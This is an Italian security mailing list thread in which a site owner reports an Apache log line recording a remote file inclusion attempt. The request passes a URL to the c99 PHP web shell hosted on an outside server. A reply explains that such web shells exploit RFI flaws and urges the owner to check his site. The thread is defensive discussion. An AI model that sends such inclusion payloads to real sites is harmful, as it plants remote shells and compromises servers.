Il giorno 30/gen/08, alle ore 00:31, David Galligani ha scritto:

Ciao ragazzi ,
innanzi tutto grazie a tutti coloro che mi hanno risposto sul tema dell' ecommerce . Mi trovo a scrivervi di nuovo , perchè stavo guardando i log del mio apache2 ( alla tv non danno niente di interessante :D ) .
E ho trovato questo :

81.246.45.219 - - [29/Jan/2008:21:29:34 +0100] "GET /admin/ business_inc/saveserver.php?thisdir=http://80.231.130.12/wwwroot/c99.txt? HTTP/1.1" 404 231

Incuriosito sono andato a vedere questo c99.txt , che di txt ha veramente poco Non pago , me lo sono scaricato per vedere che faceva , l'ho installato sul mio portatile e l'ho fatto girare . Risultato , una pseudo shell in php ( devo dire molto carina ) con cui sono riuscito a navigare fino alla / , anche se non mi faceva vedere files su cui non avevo permessi ...
Inoltre , ha tentato di mandare varie mail :

[...]

Qualcuno sa qualcosa di piú  su questo exploit ?
In caso qualcuno volesse studiarselo lo trova qui di seguito ( in attach non me lo fa mandare l'antivirus ...)

Ciao

David

Tecnicamente non ha nulla a che vedere con un exploit.. Come hai avuto modo di appurare tu stesso, è semplicemente uno script in PHP che permette di automatizzare e semplificare la navigazione all'interno del filesystem e qualche altra operazione. Non è nulla di nuovo, circolano da alcuni anni questi script negli ambienti underground, sono particolarmente apprezzati da cracker russi. Quello che tu hai trovato (c99shell) è uno dei due più noti, l'altro è r57, e poi tanti altri.. Vengono usati soprattutto per ottimizzare lo sfruttamento di vulnerabilità di tipo remote file inclusion nelle web application (http://lwn.net/Articles/203904/ ), controlla che sul tuo sito sia tutto a posto.

Saluti,

Alberto Trivero________________________________________________________
http://www.sikurezza.org - Italian Security Mailing List

Rispondere a